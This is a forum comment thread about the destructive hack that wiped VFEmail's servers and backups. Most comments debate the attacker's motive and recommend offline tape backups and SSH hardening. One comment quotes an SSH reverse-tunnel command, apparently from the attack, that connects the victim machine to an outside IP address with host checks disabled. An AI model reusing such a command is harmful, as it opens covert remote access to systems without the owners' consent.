It's dead, Jim!
Jokes aside, one wonder why a ne'er-do-well will thoroughly thrash a business to the point of no return...
A hacker wiped every server and backup of VFEmail this week in a "catastrophic" attack, according to the webmail service. VFEmail admins detailed the network intrusion on Monday in a grim red-letter update on the site's front page. The service's founder Rick Romero also said it's likely the webmail outfit is toast as a result …
they might have wanted to permanently yeet something that was on those servers
I agree - this looks like someone specifically wanted to destroy something specifically hosted by VFEmail. It may well have been simply the email archives of a single user, or a small number of users, and the attacker just wiped everything for simplicity and to disguise the true target.
It's interesting that the attacker apparently had multiple sets of credentials for the different servers; that suggests a sustained effort, with an initial phase of gathering vulnerabilities so the attacker could hit everything in a brief campaign.
"However, they might have wanted to permanently yeet something that was on those servers."
Wasn't that the main plot of a "Person Of Interest" episode a while back? Only those guys were in an emergency call centre and the bad guy was wiping the logs to delete a specific incoming call from the logs.
Interesting how Life imitates Art sometimes. Or, perhaps, could it be that Mr. HackyGuy's underlings got the idea from the programme?
I work in schools.
I can tell you the answer is most likely:
"Because they can". If not, then "For a laugh".
Same as why kids break each other's Chromebooks, pull the power from someone else's computer before the work has been saved, or turn on all the accessibility settings on the login menu so Windows starts talking to you as you move the mouse.
As an IT guy for schools, I'm much more interested in "how was this even possible".
"This takes planning, this takes will and this takes a motive. If you think the answer is "because they can" then you are incredibly naive."
I'm afraid you're the naive one. Last November, a charity in the area was collecting toys to give out to children of poor families (as they do every year). After two months of investigation they found the man that did it. His reason? He thought it would be funny to imagine all those children crying on Christmas Day. This wasn't religious, this wasn't "I'm poorer", this was just an asshole.
Also, not so nearby, a small group of teenagers stole a Twingo, poured petrol on the back seat, set it alight and with the aid of a large rock sent it driving itself into a field of wheat just before harvest time. You can imagine how many fire engines needed to be dispatched in the middle of the night. It was easy to catch the teens, they were the ones bragging about how awesome it all was - setting several fields on fire, creating a major incident, badly hitting the livelihoods of two different farmers, nearly killing a few thousand pigs (thankfully saved by the farmer ploughing strips to act as a firebreak) and causing a number of homes to need to be evacuated (thankfully saved by the firemen). Yes, very awesome if you're the sort of dick that gets off on disaster porn.
It may well have been a hack by a state actor, ex employee, or somebody with something to hide, but it is also equally believable that this was just somebody with a bit of "skillz" doing it for the hell of it. Some people are just that fucked up.
Those are all examples with motive. Like actual motive there. So this person will have motive.
"For the lolz" even has a reason for the target. Was it a group effort/doxing? If a child, why did they target this site and not another? For a child/random to target this site, seems strange.
For example, a store here got smashed. Seems like vandalism, right? Nothing got stolen? Nope, was an attempt, but lots of damage in the process. So surface "there is no reason" reasoning is empty.
I'd put a lot of your school kids problems down to lack of parenting, social construction (power play), lack of responsibility (not their chromebook, IT can fix it). etc. Systemic failings of your school, and the general bullying too.
As someone has already pointed out, these examples have a motive. Not only that, but it's a massive difference between setting fire to stuff and hacking an enterprise. Any idiot can start a fire.
Seriously people.I'm glad none of you are investigators or security consultants. This is supposed to be a techy forum, any chance you want to get your collective heads out of your collective asses? I'm not saying it's a state actor or a massive conspiracy, it could just be a disgruntled employee. Saying someone did it for the lols is just embarrassing.
I think you're all forgetting:
Computer viruses were around for many decades, and very destructive - just like this incident - for decades before they started being used to make money. People, skilled people, were writing programs and deliberately spreading them for no other reason than to destroy other people's data "because", profiting literally nothing from it at all, and unleashing them on the world rather than just one person's computer.
The motive can be simply "To prove I can". "To show them they don't have security". Or even "Because then they'll hopefully buck their ideas up".
Look at any proof-of-concept code for a recent hack and you'll find people trading it online with their own twist, and they will have a cadre of "budding" virus-writers describing how they used it "for lolz" just to try to gain reputation.
There are people in this world who will happily call in SWAT teams, waste the emergency services time (e.g. things like fire brigades just to throw stones at them when they arrive) or - as one kid did in my road many years ago - pull down their pants, crap in their hand, and smear it over the only phonebox.
There doesn't need to be a motive, if you're only doing it "for a laugh". And it doesn't need to be for a serious purpose for someone to plan such things.
You probably find that someone ran an automated tool (or even bought an automated cloud-based hacking service! They exist!), it got them a shell on a remote system that they had no idea what it even was, and then they went on IRC and asked "What should I run?" and someone copy/pasted a line to blank their hard drives, and they all had a good laugh.
Again - their motivation is neither here nor there... it could be a targeted internal attack, an external random automated script, a slip of a finger by an authorised admin, or some kids playing games... it literally does not matter. What matters is that it should not be possible. Which is why - rather than rely on "detecting" whether the kids do these things, or working out their attacker's motive - it's also better, and necessary, to just make sure they aren't possible in the first place.
why a ne'er-do-well will thoroughly thrash a business to the point of no return...
It seems an action commissioned by a competitor. Actually it's not so difficult to imagine that something like this might happen, if really all their backups are gone their mistake was not to keep some backups offline.
Yes, they should have. However, it doesn't sound as if they had terrible security elsewhere, as they commented that the VMs had different authentication and different setups, thus this attack couldn't be done by a single compromised set of credentials (hopefully). Still, if things are that large, they should have some place where email data was stored on offline and hopefully also offsite media.
What's it matter the VM's authentication when you wipe the images from the hypervisor.
Also, as mentioned above, no pity, a backup server isn't a backup, it's a hot copy at best, three physical locations and an offline to boot. None which may be much use against an ex-employee who's pissed.
Yes, they should have. However, it doesn't sound as if they had terrible security elsewhere, as they commented that the VMs had different authentication and different setups
They got hacked and had all of their data wiped; their security was inadequate to the point of being fair to describe it as "terrible".
Security is more an outcome than a process. Ticking every box and passing an audit but getting hit by something like this fails the ultimate audit called "real life".
If _I_ were running a email hosting service, _I_ would periodically hook up a tape drive, back up everything to tape, and remove the tape. In fact, I'd use different sets of tapes for different days of the week, so that if malware got in I'd have time to detect the problem before all the backups were contaminated. It's hard to erase tapes which are not even in the tape drive. It's even harder to do it multiple times because I have multiple sets of tapes. Backing up to tape means that the latest mail won't be backed up, but it would be a whole lot better to be out a few hours or even a few days of mail than to be out of _all_ mail.
For those who don't like tape, back up to a _removable_ drive... and remove it once the backup is completed. Again, have at least one removable drive per day per mail server, and physically remove the drive when the backup is done. All of my backups at work are to tape, with a nice 5TB removable drive covering the important stuff as well. Tape is slow, old-fashioned... and works. Hipsters and millennials will pry my LTO tape drives out of my cold dead hands.
It sounds as if all backups were live, online, backups, so that the backups were killed at the same time as the main systems were killed. This means that, effectively, there were no backups. They're fucked.
First you buy a lot of tape. Then you back up each server to its own tape. Every so often you pull a complete set of tapes off the tape carousel and restore them to a test VM to make sure that you have a working backup. It’s expensive, and tedious, and a full-time job, but if it isn’t done you end up with this mess.
LTO8 is about 20TB per tape so not that many tapes, even if they are a hundred bucks a pop.
The real cost, I think, would be in paying people on site to physically secure those tapes off-site. I suspect that's why VFEmail didn't have off-site physical backups; it was a relatively small operation, with servers in datacenters on multiple continents, and probably didn't have the budget to pay people to physically load blank tapes and put filled ones in storage.
It's feasible for a handful of administrators to run lots of virtual servers in datacenters around the world. It's considerably more expensive as soon as on-site human labor gets involved.
And running those sorts of backups remotely probably wouldn't have been feasible either, due to latency and bandwidth constraints.
That doesn't mean data like this shouldn't have off-site physical backups, of course. I just think the economics are difficult. How much more can you charge your customers to cover those backups without having an unsustainable fraction of them switch to competing services? Users historically have not shown much willingness to pay extra for security.
"How do you backup 100's of terabytes and live VM's?"
Answer: Any way you can, as long as it works !!!
Live backups are nice but if they are 'on-line' they are *not* 100% safe ..... as learnt !!!
You must have at some point a definition of the 'worse case' minimum data set you need to recover from *and* it must be safe from all possible dangers by design.
If your customers know in advance that definition, and are happy with it you can survive.
You then, by whatever means & costs, ensure that you can create a *safe* copy of the 'worse case' minimum data set per day/week/month (whatever your definition requires).
There are many methods to do the above, unfortunately most/all of them are expensive.
This is the 'real' cost of providing services such as e-mail etc.
I am truly sorry for the 'hit' & consequent loss of the business ..... even more so for the paying customers.
This is a failure to anticipate *all* possible modes of data loss and be prepared to handle it.
If 'on-line' then 'hacking' is one of those possible modes !!!
This is exactly why having data off-site/off-line is *so* important !!!
Only the likes of Google/Apple/Microsoft etc can afford to have *all* their data on-line because they probably have multiple copies in multiple places (in real time) behind major security systems that work !!!
live VMs typically need config files and daily data snapshots copied to "something" and that's about it. if they break you just re-build them, restore the data, and move on.
And who said it was 100's of TERABYTES anyway? I would expect commercial solutions to already exist, even if it WERE 100's of terabytes.
lots of info out there about replication and using one of the mirrors to do your backups, re-sync after, periodically storing backups in an off-site archive of some kind. Also cloud backups. And so on.
How do you backup 100's of terabytes and live VM's?
Properly. As for "live" - that's why storage facilities generally have a snapshot capability. You accept that you have a gap between backups - how large it is depends on your backup frequency - but what you cannot afford is NOT having a proper backup. QED.
By the way, backup is what makes reliable storage so expensive. If it's cheap, it's an easy guess to assume that corners have been cut in the area of backup - be wary of that.
There are many enterprises that do this every day without fail.
Netbackup - will take a live VM image and backup to disk or tape targets. Veeam - does the same thing. I'm sure that Commvault will too...
100's of TB is small fry - the last tape based system I specfied and built was running multi petabyte backups. You backup up to disk, then stage that to tapes. It's really not rocket science.
Commvault will cheerfully do a live VM image and backup, both full backup and incremental. If the underlying storage supports it, they have a feature called "Intellisnap" that leverages the storage's snapshot feature to take the image, although it's slightly more convoluted.
(I don't work for commvault, but I do use their product at my company.)
As for size: yeah, disk to disk, then secondary copy (aux. copy in commvault's parlance) to tape.
Amen to prying LTO out of my cold dead hands. Yes they are pricey at the SMB level, and getting Backup Exec to play nice is always a fun game, but the cartridges are cheep enough to keep full backups permanently every week/month for both DR and Compliance.
That, and I've never had trouble getting a customer that has previously lost data to budget for one to do them properly.
At that scale, Robotic tape libraries may become an out of hand cost but geeze, some kind of offline backup people! Imagine if they'd Cryptolocker'd their on network - did this scenario never occur to them?
And there was me feeling slightly old-skool buying an LTO drive and a box of tapes back in December to backup my Veeam online backup. As an SMB, it's a cheap, efficient solution to getting offline backups that are air-gapped from NotPetya and this sort of thing and it gives the junior a nice boring task each day. Re the remark about Backup Exec - I feel your pain; Veeam handles tape jobs beautifully (it's effectively just copying the online one to the tape) in comparison and it was a snap to set up.
Funnily enough, it took a bit of explanation to the various suppliers I contacted that yes, I really did want tape, and no, I didn't see the value in spending the same as it eventually cost each month to have another online copy in a DC somewhere.
That, and I've never had trouble getting a customer that has previously lost data to budget for one to do them properly.
Over the years, with various hats on (variously in house and providing services to clients) there's always been the notion that the easiest time to sell backup to [the client|manglement] is when lack of a proper backup has caused data loss. At my last job I did my best with the budget allowed to me (zero, just what I could scavenge as other stuff got upgraded) - I had rolling multi-copy backups but was never happy that while they were on separate disks, they were in the same box as one of the VM hosts. Unfortunately I never managed to scrape together the hardware to replicate the backups to another site I had available to me - and even then it would have left us open to this sort of thing.
But it does look like it was a really deliberate job if the criminals (lets call them what they are) were able to compromise a range of systems with different authentications.
Good points about tape but you missed the important one: Test your backups. Having a tape is no good if you can't restore it after your system has been hacked/burnt/stolen/confiscated/mislaid. Also no good if the tapes are worn out because you cycle around the same five daily backup tapes for 5 years.
Anything important to me - I back it up myself.
Early in my career, I was working at IBM and had a PC RT (IBM's first commercial UNIX workstation) running AOS 4.3 (IBM's BSD port for the RT). The machine had a pair of 40MB drives.
Someone found a 70MB drive in one of our Rooms Of Discarded Stuff. (I was at IBM's Kendall Square building, which also hosted the Cambridge Scientific Center, so the site was full of weird experimental hardware and random used bits and pieces, stashed willy-nilly in unused offices.) So I figured I'd give myself a 30MB upgrade. I was going to take the machine down to put in a faster CPU daughterboard anyway.
Since I was going to repartition, I backed all my stuff up to QIC tape. Then I shut the machine down, swapped the 70MB drive in for one of the 40MB ones, booted to the AOS install tape, partitioned the drives, installed the OS, and went to install from my backup tapes.
The backup tapes were unreadable. I don't know why; they were reused and may have been too old, or I may have messed up with my mt and tar command lines; or there might have been something wrong with the tape drive. (It read the OS install tapes, but like an idiot I hadn't tried writing a tape and reading it back.)
All my actual work for IBM was in source code control on the AFS network filesystem, of course. Even at that age I wasn't a complete idiot. I always operated on the assumption that my workstation might die at any moment, and the work I was paid to do had damn well be preserved somewhere else. And some personal stuff I really cared about had been backed up to floppies or whatnot. But I lost a bunch of personal projects I was goofing around with after hours, like my personal X11 window manager.
It was a painful lesson - I probably spent half a day trying to get those damn tapes read. But eventually I accepted it.
(Then, years later, I had a laptop hard drive suffer catastrophic controller failure while I was in the process of backing it up. All I lost that time was a few days' worth of emails, because I was pretty vigilant about keeping stuff backed up. And checking those backups.)
"Also no good if the tapes are worn out because you cycle around the same five daily backup tapes for 5 years."
Some years ago, I got a call from one of clients to go visit one of their satellite offices to check up on their backups. The non-techy person in charge of the tapes had been correctly following the instructions of placing the correct tape in the drive before leaving each day and then removing the ejected tape and putting it on the shelf. Except they'd not had a backup even start for over 6 months because the tapes had expired and were being ejected as soon as 8pm backup process started.
I can't remember why they asked me to go in the first place or how they found out there might be a problem, but the upshot was they suddenly decided it would be a good idea to use the backup apps ability to email a status report to head office after each run. I heard later they sent a full new set of tapes to every satellite office because none of them had been completing for many months.
Note, this was an insurance company, many years ago, DOS clients and Netware servers were still al the rage.
Good points about tape but you missed the important one: Test your backups. Having a tape is no good if you can't restore it after your system has been hacked/burnt/stolen/confiscated/mislaid. Also no good if the tapes are worn out because you cycle around the same five daily backup tapes for 5 years.
THIS TIMES INFINITY AND BEYOND!!!!
We have both a near-time replication of critical apps to DR, daily/weekly disk to disk backups, and monthly copy to tape, and limit the number of write cycles on the tape. Commvault is smart enough to flag a tape as bad if it gets too many errors on it, and it will also deprecate a tape and refuse to write to it after a certain number of cycles. (your backup application may or may not operate in a similar manner.)
Ah yes. So I'm not the only one. I still believe backup tapes have their place.
I got interested in backups in the NHS when I saw their solution years ago. Then adopted it at home but not on tape as couldn't afford the setup.
Anyway.
Monday full backup
Tues to Thursday incremental backup
Friday full week 1 backup.
Rinse and repeat for 3 weeks.
Then on the 4th Friday of the month it becomes
Month 1 backup
Rinse and repeat for 3 months so you always have 3 months of offline backups that are stored in a fire proof safe either offsite, or onsite but in another fire zone. Which can end up being either another location in the same building or another location onsite but in a different building.
All on tape.
Worked well.
I find that explanation lacking. "backup server" does not imply backed up data. If a network backup system, for example Bacula, is being used, then backup servers are the nodes (or VMs) that are running the network backup app, implying that they temporarily have no way to access the backed up data, but not that the backed up data, off-site or not, doesn't exist. Or "backup servers" could mean passive failover nodes (or VMs) in a high availability cluster. Very misleading terminology. So what exactly is/was a "backup server" at VFEmail?
"Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it."
One could also draw the conclusion that since someone cared enough to thoroughly nuke the whole thing - ransom be damned - then it was certainly doing a good job at some level (though not the security/backups level, presumably).
But then, other people just want to watch the world burn.
. . how an external hacker without any contact (accomplice) in the company could totally wipe all production servers and all backup servers in one go, without ever being detected ?
Okay, forget the detection part - the IT admins could be clueless - but that does not go with the fact that they had different credentials for different servers. They were at least doing something right.
And why go and nuke everything if you're just a hacker ? That's not going to make you any money.
This smells very strongly of an inside job. Done by a state-level actor or not, this is not some group out of Sevastopol just having some fun.
And why go and nuke everything if you're just a hacker ? That's not going to make you any money.
Unless someone was paid to push the customers to the competition.
This smells very strongly of an inside job.
This is possible. Sysadmins could be bribed, especially if they are paid as much as Asian undergraduates.
Done by a state-level actor or not,
The corporate world with its history of unfair competition seems more interested than a state actor. So I think that a private actor is much more likely.
this is not some group out of Sevastopol just having some fun.
Groups out of Sevastopol most of the times are paid in dollars,not rubles.
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
Nice SSH reverse forwarding port. So essentially something already from inside opened the door wide open to this aktv for allowing to either enter an IP-firewalled SSH or to a dedicated one.
Either way, that looks a lot like an inside job.
ack on the 'launch the hack from there' - I figured Tor network at the very least, or the dozens of computers altready engaged in dictionary attacks against ssh.
A couple of defenses against that, worth mentioning:
a) disallow root logins
b) only enable specific users [that have guest-level] and require 'su' to root to do "anything"
c) forget passwords, certs only
d) use things like 'fail2ban' to reduce the total number of attempts, and keep a log [of sorts] of those who attempt to crack your ssh
this assumes you NEED SSH in the first place (otherwise, shut it off from teh intarwebs)
Iron Mountain isn't even that good, they lose shit constantly. Also, from a continuity perspective, they may be among the first but its more a gimmick than actual competency. The mine they initially used wouldn't have survived a nuclear attack, or even all that strong of a conventional attack with WWII era weapons, nor would the facility in Massachusetts that they like to hype up. Sure, OPM leases another hole near that one, but its telling that they don't keep their records for NSPD 51/HSPD 22 compliance there. Its just the retirement record archives that NARA doesn't maintain.
The old school Federal Regional Centers like in Thomasville, Bothell, and Denton have their uses as does all the "empty" floor space at Site R and High Point and the various other places like Ukiah, Kauai, the AT&T Project Offices, and (especially) the other parts of the continuity belt in West Virginia. In other words, just because you have a large company running marketing based on their supposed credentials and experience, there are far better ones out there, some of whom you probably wouldn't expect.
Just two and a half cents from someone working in this field.
I clear out the filters on our mail server every day ... we're not a big company but recently I've seen increasing login attempts, every couple of seconds someone somewhere in the world attempts to login in, and we are getting a lot more viruses and trojan deliveries since the start of the year.
Who is to say the hackers did not make a copy of all the current mail on the system? In which case it is also a breach of personal information.
And since they are marketing their services to customers in the EU then it would also be a breach under GDPR....
Tits-up and fined. OK probably couldn't be worse. Unless disgruntled people come start doing nasty things to your bits in revenge for losing theirs. That would be worse. Given the week they are having perhaps they should consider Outer Mongolian yak herding as a new business model.